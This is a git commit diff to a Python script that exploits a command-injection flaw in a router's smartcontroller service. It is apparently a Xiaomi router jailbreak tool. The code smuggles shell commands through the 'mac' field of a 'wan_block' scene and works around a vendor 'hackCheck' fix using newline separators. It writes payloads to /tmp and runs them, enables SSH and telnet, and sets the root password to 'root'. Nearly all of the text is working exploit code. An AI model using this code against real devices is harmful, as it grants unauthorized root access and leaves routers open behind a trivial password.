[connect5] Cleanup code and add support RC01 and RC06

remittor 1 year ago
parent 1031b3ac04
commit 3ad7eb2980

@ -63,6 +63,7 @@ int32_t run_sysapi_macfilter(char* mac, int32_t wan_block)
vuln_cmd = "/usr/sbin/sysapi macfilter set mac=;; wan=no;/usr/sbin/sysapi macfilter commit"
max_cmd_len = 100 - 1 - len(vuln_cmd)
hackCheck = False
def exec_smart_cmd(cmd, timeout = 7):
api = 'xqsmarthome/request_smartcontroller'
@ -75,30 +76,39 @@ def exec_smart_cmd(cmd, timeout = 7):
raise ExploitError(f'Cannot send POST-request "{sc_command}" to SmartController service. {msg}')
return res.text
def reset_smart_task():
res = exec_smart_cmd( { "command": "reset_scenes" } )
def exec_smart_command(cmd, timeout = 7, ignore_err_code = 0):
res = exec_smart_cmd( { "command": cmd } , timeout = timeout)
dres = json.loads(res)
code = dres['code']
except Exception:
raise ExploitError(f'Error on parse response for command "reset_scenes" => {res}')
if code != 0:
raise ExploitError(f'Error on exec command "reset_scenes" => {res}')
return res
if ignore_err_code >= 2:
return res
raise ExploitError(f'Error on parse response for command "{cmd}" => {res}')
if ignore_err_code == 0 and code != 0:
raise ExploitError(f'Error on exec command "{cmd}" => {res}')
return dres
def reset_smart_task():
return exec_smart_command("reset_scenes")
def get_all_scenes():
return exec_smart_command("get_scene_setting")
x_hour = 0
x_min = 0
def exec_tiny_cmd(cmd, act_delay = 0):
def exec_tiny_cmd(cmd, act_delay = 2):
global x_hour, x_min
if len(cmd) > max_cmd_len:
raise ExploitError(f'Payload string line is too long (len = {len(cmd)}, max_len = {max_cmd_len})')
raise ExploitError(f'Payload string is too long (len = {len(cmd)}, max_len = {max_cmd_len})')
x_min += 1
if x_min == 60:
x_min = 0
x_hour += 1
if x_hour == 24:
x_hour = 0
sep = '\n' if hackCheck else ';'
# scene_setting + action_list + launch
pdata = {
"command": "scene_setting",
@ -109,7 +119,7 @@ def exec_tiny_cmd(cmd, act_delay = 0):
"type": "wan_block",
"payload": {
"command": "wan_block",
"mac": ";" + cmd + ";"
"mac": sep + cmd + sep
} ],
"launch": {
@ -163,10 +173,13 @@ def exec_tiny_cmd(cmd, act_delay = 0):
raise ExploitError(f'Error on exec command "scene_delete" => {res}')
return res
def exec_cmd(command):
def exec_cmd(command, fn = '/tmp/e', run_as_sh = True):
if hackCheck:
command = command.replace(' ; ', '\n')
command = command.replace(' ; ', ';')
spec_sym = [ '"', '\\', '`', '$' ]
fn = '/tmp/e'
spec_sym = [ '"', '\\', '`', '$', '\n' ]
fcmd = 'echo -n{spec} "{txt}"{amode}{fn}'
flen = len(fcmd.format(spec="", txt="", amode="", fn=fn))
amode = ">"
@ -195,13 +208,16 @@ def exec_cmd(command):
spec = ""
if len(txt) == 1 and txt in spec_sym:
spec = "e"
if txt == '\n':
txt = "n"
txt = f"\\{txt}"
cmd = fcmd.format(spec=spec, txt=txt, amode=amode, fn=fn)
exec_tiny_cmd(cmd, act_delay = 2)
exec_tiny_cmd(f"chmod +x {fn}", act_delay = 2)
exec_tiny_cmd(f"sh {fn}", act_delay = 2)
if run_as_sh:
exec_tiny_cmd(f"chmod +x {fn}")
exec_tiny_cmd(f"sh {fn}")
def get_dev_systime():
@ -239,10 +255,27 @@ def set_dev_systime(dst, year = 0, month = 0, day = 0, hour = 0, min = 0, sec =
raise ExploitError(f'Error on exec command "set_sys_time" => {res}')
return res.text
# Test smartcontroller interface
res = get_all_scenes()
# Detect using hackCheck fix
hackCheck = False
res = exec_smart_command("aaaaa;$", ignore_err_code = 2)
if isinstance(res, dict):
if res['msg'] != 'api not exists':
die(f'Smartcontroller return error: {res}')
if 'Internal Server Error' in res:
print(f'Detect using xiaoqiang "hackCheck" fix ;-)')
hackCheck = True
die(f'Smartcontroller return Error: {res}')
# get device orig system time
dst = get_dev_systime()
print('Disable alarm mode for smartcontroller service ...')
print('Enable smartcontroller scene executor ...')
# echo "OK" > /tmp/ntp.status
res = set_dev_systime(dst)
@ -257,7 +290,7 @@ start_time = datetime.datetime.now()
while datetime.datetime.now() - start_time <= datetime.timedelta(seconds = 32):
res = exec_tiny_cmd("date -s 203301020304", act_delay = 2)
res = exec_tiny_cmd("date -s 203301020304")
except Exception:
@ -286,22 +319,28 @@ if not sc_activated:
#die('----- TEST FINISHED ------')
print('Unlock dropbear service ...')
res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
print('Unlock SSH server ...')
res = exec_cmd("nvram set ssh_en=1; nvram set telnet_en=1; nvram commit")
print('Set password for "root" user (password: "root") ...')
res = exec_cmd(r"echo -e 'root\nroot' | passwd root")
print('Enable dropbear service ...')
res = exec_cmd("/etc/init.d/dropbear enable")
exec_cmd("nvram set ssh_en=1 ; nvram set telnet_en=1 ; nvram commit")
print('Set password "root" for root user ...')
exec_tiny_cmd("echo root >/tmp/x")
exec_tiny_cmd("echo root >>/tmp/x")
exec_tiny_cmd("passwd root </tmp/x")
print('Enabling dropbear service ...')
exec_cmd("/etc/init.d/dropbear enable")
print('Run SSH server on port 22 ...')
res = exec_cmd("/etc/init.d/dropbear restart")
exec_cmd("/etc/init.d/dropbear restart")
print('Test SSH connection to port 22 ...')
gw.use_ssh = True
gw.passw = 'root'
ssh_en = gw.ping(verbose = 0, contimeout = 25) # RSA host key generate slowly!
ssh_en = gw.ping(verbose = 0, contimeout = 18) # RSA host key generate slowly!
if ssh_en:
print('#### SSH server are activated! ####')
@ -310,9 +349,9 @@ else:
if not ssh_en:
print('Unlock TelNet server ...')
exec_cmd("[ `bdata get telnet_en` != '1' ] && bdata set telnet_en=1 && bdata commit")
exec_cmd("bdata set telnet_en=1 ; bdata commit")
print('Run TelNet server on port 23 ...')
exec_cmd("/etc/init.d/telnet enable; /etc/init.d/telnet restart")
exec_cmd("/etc/init.d/telnet enable ; /etc/init.d/telnet restart")
gw.use_ssh = False
telnet_en = gw.ping(verbose = 2)
